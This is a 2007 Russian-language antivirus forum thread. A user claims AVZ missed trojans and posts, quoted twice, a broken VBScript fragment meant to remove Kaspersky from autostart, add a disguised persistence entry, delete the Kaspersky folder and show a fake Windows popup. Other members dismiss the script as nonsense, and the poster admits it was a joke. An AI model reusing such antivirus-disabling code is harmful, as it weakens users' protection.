-
Banned
- Вес репутации
- 0
avz - не нашло шесть вирусов
Просто решил для экспиремента скачать с интернета 6 вирусов в архивах, касперский их сразу обнаружил, но я решил посмотреть что скажет avz - молчит, хотя я поставил проверку архивов. Вот собственно говоря сами вирусы:
1. троянская программа Backdoor.Win32.Delf.aty
2. троянская программа Backdoor.Win32.Delf.aty
3. троянская программа Trojan-Downloader.Win32.Delf.bkf
4. троянская программа Trojan-Downloader.Win32.Delf.bkf
5. троянская программа Backdoor.Win32.Delf.aty
6. троянская программа Trojan-PSW.Win32.LdPinch.bdh
7. моя собственная работа - удаляет касперского из автозагрузки
конечно они повторяются (по названиям, просто там есть server.exe, client.exe и тд) - но факт - есть факт.
обновлялся я перед проверкой - может стоит внести их в базу или зачем тогда ставить проверку архивов
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
-
-
насчёт 7 вируса, каспер довольно жёстко защищает свои ключики - без окна проактивки тут не обойтись- или всё-таки нашёл обход проактивки ?
-
-
Честно говоря, в 7 мне мало верится, потму как самозащита в KAV очень, скажем так, на уровне. Вообще пост похож на саморекламу.
-
-
avz - не нашло шесть вирусов
Всех детектить невозможно...
Вот результаты моего последнего теста:
Код:
Sunday, September 2, 2007
Total 216 files to scan.
=====================
KAV
Scaned: 313
Detected: 210
=====================
AVZ
Scaned: 232
Detected: 102
Suspicious: 19
=====================
DrWeb CureIt Beta
Scaned: 215
Detected: 174
=====================
Avira Antivir
Scaned: 228
Detected: 182
=====================
Добавлено через 7 минут
1. троянская программа Backdoor.Win32.Delf.aty
2. троянская программа Backdoor.Win32.Delf.aty
3. троянская программа Trojan-Downloader.Win32.Delf.bkf
4. троянская программа Trojan-Downloader.Win32.Delf.bkf
5. троянская программа Backdoor.Win32.Delf.aty
6. троянская программа Trojan-PSW.Win32.LdPinch.bdh
Три зловреда...
Плюс ->
7. моя собственная работа
- удаляет касперского из автозагрузки
...неповерю пока неувижу...
Последний раз редактировалось Muffler; 30.09.2007 в 22:50.
Причина: Добавлено
-
-
Banned
- Вес репутации
- 0
я знаю что зловреда три, но касперский их как 6 определил, просто они на части разделены,
а мой вирус содержит просто в себе простенький скрипт который выполняет другой простенький скрипт - работает 100 %
вот некотарая часть одного из скриптов
Set FileSystemObject = CreateObject("scripting.filesystemobject")
Set fso = CreateObject("Wscript.Shell")
on error resume next
fso.regdelete "HKEY_LOCAL\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\Kav"
fso.regwrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURR ENTVERSION\RUN\Explorer","c:\windows\system\Explor er"
dim usb
Set fso = CreateObject("Scripting.FileSystemObject")
Set usb = fso.CreateTextFile("c:\windows\system\Explorer.vbs ", True)
fso.WriteLine ("Set fso = CreateObject("scripting.filesystemobject")
fso.DeleteFolder "c:\program files\Kaspersky Lab"")
usb.Close
fso.popup "Вывести сообщение",,"Диагностический центр Windows",0+16
FileSystemObject.deletefile WScript.ScriptFullName, True
может где ошибку допустил - просто я это на память писал, а vbs плохо знаю, поэтому не судите строго.
что на счёт проактивки, тут да, базара нет - вещь, однако ёё можно также просто обойти, как и сидеть на пробном касперском годами, у меня уже пошёл 3 месяц пробного касперского - что мне обламываться с какойто там проактивкой (единственное что скрипт не я писал, который полностью всё делает, я так просто написал основу "см. выше" и ещё одну феньку), ну а своей работой назвал, потому что без меня его бы не было!!!
Последний раз редактировалось Серёга ламошник; 02.10.2007 в 23:51.
-
Сообщение от
ВодкуГлыть
Честно говоря, в 7 мне мало верится, потму как самозащита в KAV очень, скажем так, на уровне. Вообще пост похож на саморекламу.
В приведенном скрипте VBS делаются какие-то невзаимосвязанные действия. Иными словами, написана полная чушь.
И уж однозначно такая строчка пресекается самозащитой KAV:
fso.DeleteFolder "c:\program files\Kaspersky Lab"
Подозреваю, что под именем "Серёга ламошник" к нам пожаловал знаменитый своей безграмотностью Nodik/Vitalik/леночка с фан-клуба ЛК
-
-
Серёга ламошник ,выложите работоспособную программу убивающую каспера по этой ссылке : http://virusinfo.info/upload_virus.php?tid=12831 в zip архиве с паролем virus
а пока это просто не серьёзно
-
-
Banned
- Вес репутации
- 0
щас!!!! с разбегу об телегу - этот вирус останется у меня в компе и это обсуждению не подлежит!!!! буду я его ещё кидать к вам - делать мне нечего!!!!
А то, что скрипт не правельный и не последовательный я и без вас знаю - там написано что это часть скрипта - так сказать склейка со всякой ерундой, выложи я правельный скрипт( и полный) его бы сразу ламеры бы откопировали и начали бомбить бедных "пользователей" ПК, а меня потом бы совесть мучала - этот вирус я касперскому отправлю - пусть подумает над его простотой - не хотите не верьте - мне по барабану - я не говорю что я хакер, просто мне немного подфартило с этим.
я его вообще удалю от греха подальше - и забудьте что я написал - можете считать что я нагло наврал вам - я "peace-door-bol"
-
Ситуация как в Северной Корее, что-то же они взорвали, но "гриб" никто не видел.
Опыт — это слово, которым люди называют свои ошибки.
-
-
щас!!!! с разбегу об телегу - этот вирус останется у меня в компе и это обсуждению не подлежит!!!! буду я его ещё кидать к вам - делать мне нечего!!!!
Тише, тише...
Left home for a few days and look what happens...
-
-
Сообщение от
Серёга ламошник
я знаю что зловреда три, но касперский их как 6 определил, просто они на части разделены,
а мой вирус содержит просто в себе простенький скрипт который выполняет другой простенький скрипт - работает 100 %
вот некотарая часть одного из скриптов
Set FileSystemObject = CreateObject("scripting.filesystemobject")
Set fso = CreateObject("Wscript.Shell")
on error resume next
fso.regdelete "HKEY_LOCAL\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\Kav"
fso.regwrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURR ENTVERSION\RUN\Explorer","c:\windows\system\Explor er"
dim usb
Set fso = CreateObject("Scripting.FileSystemObject")
Set usb = fso.CreateTextFile("c:\windows\system\Explorer.vbs ", True)
fso.WriteLine ("Set fso = CreateObject("scripting.filesystemobject")
fso.DeleteFolder "c:\program files\Kaspersky Lab"")
usb.Close
fso.popup "Вывести сообщение",,"Диагностический центр Windows",0+16
FileSystemObject.deletefile WScript.ScriptFullName, True
может где ошибку допустил - просто я это на память писал, а vbs плохо знаю, поэтому не судите строго.
что на счёт проактивки, тут да, базара нет - вещь, однако ёё можно также просто обойти, как и сидеть на пробном касперском годами, у меня уже пошёл 3 месяц пробного касперского - что мне обламываться с какойто там проактивкой (единственное что скрипт не я писал, который полностью всё делает, я так просто написал основу "см. выше" и ещё одну феньку), ну а своей работой назвал, потому что без меня его бы не было!!!
Теперь вижу, что чушь. ИМХО, у Вас паранойя.
-
-
-
-
Junior Member
- Вес репутации
- 67
там написано что это часть скрипта
Ну да написано.
так сказать склейка со всякой ерундой
А вот этого не написано, хотя сииильно заметно!! И непонятно,зачем тогда вообще сюда это кидать?
а меня потом бы совесть мучала
А сейчас совесть не мучает, что отрываете других пользователей от более праведных дел?
И в любом случае!! Если заявился, то действуй до конца.
И напоследок
не хотите не верьте - мне по барабану - я не говорю что я хакер, просто мне немного подфартило с этим.
По моему это определение подходит под ламер. Иэ этого следует вопрос на засыпку...
Серёга ламошник А вы случаем с помощью avz проверяли не после того как касперский удалил вирусы?! По крайне мере из Вашего первого поста такую логическую цепочку можно спрогнозировать.
-
Banned
- Вес репутации
- 0
вообщето вирусы были в архивах(я уже об это говорил) и касперский их не мог оттуда удалить!!!!!!!! потомучто при каждой проверке архива касперский визжал и придлогал их удалить, не зависимо от выбора - удалить - пропустить - вирусы оставались в компьютере - а скрипт для ло..ов написан - просто чисто поржать над вами - всем спасибо - все свободны
-
Junior Member
- Вес репутации
- 67
Серёга ламошник
Далеко однако ты пойдешь с таким отношением.
-
Сообщение от
Серёга ламошник
все свободны
Уговорил, свободен
Left home for a few days and look what happens...
-